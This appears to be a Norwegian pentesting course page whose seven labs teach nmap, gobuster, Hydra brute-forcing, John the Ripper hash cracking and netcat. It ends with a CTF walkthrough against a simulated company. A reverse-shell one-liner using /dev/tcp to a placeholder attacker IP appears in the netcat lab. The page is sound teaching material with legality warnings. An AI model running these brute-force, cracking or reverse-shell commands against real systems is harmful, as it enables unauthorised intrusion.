← Tilbake
Modul 6
Kali Linux & Pentesting

Lær verktøyene profesjonelle angripere bruker — steg for steg fra nybegynner til et komplett CTF-angrep mot en simulert bedrift.

7 labber Lab 1–3: Grunnlag Lab 4–6: Verktøy Lab 7: CTF 🚩 3 flagg å finne
Fremgang0 / 7 fullført
🚩 CTF Scoreboard — InnoTech AS
FLAG{1} — Webserver
FLAG{2} — Passord
FLAG{3} — Root
01 Velkommen til Kali — terminalen er ditt våpen
GrunnlagNivå 1
Nivå 1 — Kali-intro

Kali Linux er et spesialisert Linux-distro laget for penetrasjonstesting. Alt skjer i terminalen. Bli komfortabel her — du vil bruke den i alle andre labber.

Mål
1
Finn ut hvem du er: whoami og id
2
Naviger filsystemet: pwd, ls, ls -la, cd /
3
Finn nettverksinfo: ip a og ifconfig
4
Utforsk Kali-verktøy: ls /usr/bin | grep nmap
5
Les manualen til et verktøy: man nmap (trykk q for å avslutte)
I Kali er du nesten alltid innlogget som root — det betyr full tilgang til alt på maskinen. Med stor makt følger stort ansvar. Bruk alltid Kali kun i lab-miljøer.
Viktige stier i Kali:
/home/kali — din hjemmemappe
/usr/bin — installerte programmer
/etc — konfigurasjonsfiler
/var/log — logger

Tips: Tab-completion er din beste venn — trykk Tab for å autocomplete kommandoer og filnavn.
Lab 1 fullført!
root@kali:~# — Kali Linux 2024
Kali GNU/Linux Rolling
Kernel: Linux 6.6.9-amd64
Velkommen til Kali Linux — skriv 'help' for kommandoer
Prøv: whoami
root@kali:~# 
02 nmap — kartlegg nettverket
GrunnlagNivå 2
🛠 nmap
Nivå 2 — Portscanning

nmap (Network Mapper) er det første verktøyet en pentester bruker. Det kartlegger hvilke maskiner som er oppe, hvilke porter som er åpne, og hvilke tjenester som kjører.

Mål
1
Skann én host: nmap 10.10.10.50
2
Raskere skann med -T4: nmap -T4 10.10.10.50
3
Detaljert versjonsskann: nmap -sV 10.10.10.50
4
OS-deteksjon: nmap -O 10.10.10.50
5
Full aggressiv skann: nmap -A 10.10.10.50
nmap flagg du må kunne:
-sV = versjonsskanning (hva kjører på porten?)
-sC = kjør standard scripts
-O = operativsystem-deteksjon
-p- = skann ALLE 65535 porter
-T4 = raskere timing (T1=stille, T5=aggressiv)
-A = alt på én gang
Typisk nmap-workflow:
1. Rask skann: nmap -T4 -p- [IP] — finn alle åpne porter
2. Detaljert: nmap -sV -sC -p [porter] [IP] — finn versjoner
3. Dokumenter alt — noter porter, tjenester og versjoner

Husk: nmap-skanning uten tillatelse er ulovlig mot systemer du ikke eier.
Lab 2 fullført!
root@kali:~# — nmap lab
Target: 10.10.10.50 — InnoTech AS webserver
Prøv: nmap 10.10.10.50
root@kali:~# 
03 Gobuster — finn skjulte kataloger
GrunnlagNivå 3
🛠 gobuster
Nivå 3 — Web enumeration

Gobuster prøver systematisk tusenvis av vanlige katalognavn mot en webserver. Mange nettsider har skjulte administrasjonspaneler, backup-filer og config-filer som ikke er linket noe sted.

Mål
1
Skann etter kataloger: gobuster dir -u http://10.10.10.50 -w wordlist.txt
2
Les outputen — hvilke statuskoder betyr hva?
3
Utforsk funnene med curl http://10.10.10.50/admin
4
Forklar: hva er forskjellen på 200, 301, 403 og 404?
HTTP-statuskoder:
200 = OK — katalogen eksisterer og er tilgjengelig
301 = Redirect — eksisterer, peker videre
403 = Forbidden — eksisterer, men tilgang nektet (interessant!)
404 = Not Found — eksisterer ikke

En 403 er faktisk nyttig — den bekrefter at katalogen finnes.
Nøkkelfunn på InnoTech:
/admin — 200 OK, innloggingspanel
/backup — 403 Forbidden (eksisterer!)
/config.php.bak — 200 OK (backup-fil!)

Backup-filer er en klassisk svakhet — utviklere glemmer å slette dem, og de inneholder ofte databasepassord i klartekst.
Lab 3 fullført!
root@kali:~# — gobuster lab
Target webserver: http://10.10.10.50
Prøv: gobuster dir -u http://10.10.10.50 -w wordlist.txt
root@kali:~# 
04 Hydra — brute-force innlogging
VerktøyNivå 4
🛠 hydra
Nivå 4 — Brute force

Hydra prøver systematisk brukernavn/passord-kombinasjoner mot tjenester. Fra nmap vet vi at SSH kjører på port 22. Fra nettsiden vet vi brukeren heter admin.

Mål
1
Brute-force SSH: hydra -l admin -P passwords.txt ssh://10.10.10.50
2
Les output — hva betyr grønn [SUCCESS]-linje?
3
Prøv HTTP-form: hydra -l admin -P passwords.txt 10.10.10.50 http-post-form "/admin:user=^USER^&pass=^PASS^:Invalid"
4
Forklar: hva stopper et Hydra-angrep i praksis?
Hydra syntax:
-l = ett brukernavn
-L = fil med brukernavn
-p = ett passord
-P = fil med passord (wordlist)
-t = antall parallelle tråder

Vanlige wordlists i Kali: /usr/share/wordlists/rockyou.txt
Passord funnet: admin:password123

Hva stopper Hydra:
• Rate limiting (maks X forsøk/minutt)
• Account lockout etter N feil forsøk
• MFA / 2FA — passord alene er ikke nok
• Sterke, unike passord (ikke i wordlist)
• IP-blokkering via fail2ban
Lab 4 fullført!
root@kali:~# — hydra lab
Mål: SSH på 10.10.10.50:22
Kjent bruker: admin
Wordlist: passwords.txt (100 vanlige passord)
Prøv: hydra -l admin -P passwords.txt ssh://10.10.10.50
root@kali:~# 
05 John the Ripper — knekk passordhashes
VerktøyNivå 5
🛠 john
Nivå 5 — Passordknekking

Du har fått tak i /etc/shadow fra InnoTech-serveren. Filen inneholder hashed passord. John the Ripper prøver å knekke dem med en wordlist.

Mål
1
Se hashen: cat shadow.txt
2
Knekk med wordlist: john --wordlist=rockyou.txt shadow.txt
3
Se resultater: john --show shadow.txt
4
Kombiner med regler: john --wordlist=rockyou.txt --rules shadow.txt
5
Forklar: hva er forskjellen på dictionary-attack og brute force?
John-regler muterer ord fra wordlist: passwordPassword1, p@ssw0rd, PASSWORD osv.

Hashtyper oppdages automatisk av John, men du kan spesifisere: --format=sha256, --format=bcrypt osv.
Knekte passord:
root : toor (trivielt — standard Kali-passord!)
admin : password123
dbuser : Summer2023!

Dictionary vs Brute force: Dictionary prøver ord fra en liste — raskt, men avhengig av at passordet er i lista. Brute force prøver alle kombinasjoner — alltid funnet til slutt, men kan ta millioner av år.
Lab 5 fullført!
root@kali:~# — john lab
Fil: shadow.txt — hentet fra InnoTech-server
Prøv: cat shadow.txt
root@kali:~# 
06 Netcat — det sveitsiske lommekniven
VerktøyNivå 6
🛠 netcat / nc
Nivå 6 — Netcat

Netcat kan lytte på porter, koble til tjenester, sende filer og sette opp reverse shells. Det er sannsynligvis det mest brukte verktøyet i en angripers arsenal.

Mål
1
Koble til en port: nc 10.10.10.50 80 — deretter GET / HTTP/1.0
2
Lytt på en port (listener): nc -lvnp 4444
3
Simuler mottak av reverse shell: nc -lvnp 4444 + se hva som kobler til
4
Forklar: hva er forskjellen på bind shell og reverse shell?
Bind shell: Offer lytter på en port — angriper kobler INN. Blokkeres av offerets brannmur.

Reverse shell: Offer kobler UT til angripers maskin. Brannmuren tillater utgående trafikk → mye vanskeligere å blokkere.

nc -lvnp 4444 = listen, verbose, no DNS, port 4444
Reverse shell one-liner (bash):
bash -i >& /dev/tcp/ANGRIPERS_IP/4444 0>&1

Kjøres på target-maskinen. Kobler tilbake til angripers nc -lvnp 4444.

Angriperen får en interaktiv shell på target — som om de satt foran maskinen.
Lab 6 fullført!
root@kali:~# — netcat lab
Netcat — tilkobling og lytting
Prøv: nc 10.10.10.50 80
Eller: nc -lvnp 4444
root@kali:~# 
07 🚩 CTF — Hack InnoTech AS (recon → exploit → root)
CTFNivå 7
Nivå 7 — Full CTF

Alt du har lært — nmap, gobuster, hydra, john, netcat — brukes nå mot InnoTech AS. Du starter med kun én IP-adresse. Finn alle 3 flagg.

SCENARIO
Du er hyret som pentester for InnoTech AS. De har gitt deg én IP: 10.10.10.50
Ingen annen info. Start fra scratch.
🚩 Flagg å finne
F1
Finn skjult fil på webserveren
F2
Knekk et passord fra databasen
F3
Eskaler til root og les /root/flag.txt
Metodikk (følg denne rekkefølgen)
1
Recon: nmap — finn porter og tjenester
2
Enum: gobuster — finn skjulte sider
3
Exploit: hydra — brute-force SSH
4
Post: john + cat — les filer, knekk hashes
5
Privesc: sudo -l — eskaler til root
Stuck? Prøv disse kommandoene i rekkefølge:
1. nmap -sV 10.10.10.50
2. gobuster dir -u http://10.10.10.50 -w wordlist.txt
3. curl http://10.10.10.50/secret
4. hydra -l admin -P passwords.txt ssh://10.10.10.50
5. ssh admin@10.10.10.50 (passord: password123)
6. cat /var/www/html/config.php
7. john --wordlist=rockyou.txt db_hashes.txt
8. sudo -lsudo su
9. cat /root/flag.txt
Lab 7 fullført — alle flagg funnet!
root@kali:~# — CTF: InnoTech AS
╔══════════════════════════════════════╗
║ CTF — HACK INNOTECH AS ║
╚══════════════════════════════════════╝
Target IP: 10.10.10.50
Flagg å finne: 3
Start med: nmap -sV 10.10.10.50
Skriv 'help' for tilgjengelige kommandoer
root@kali:~# 
← E-post Tilbake til oversikten →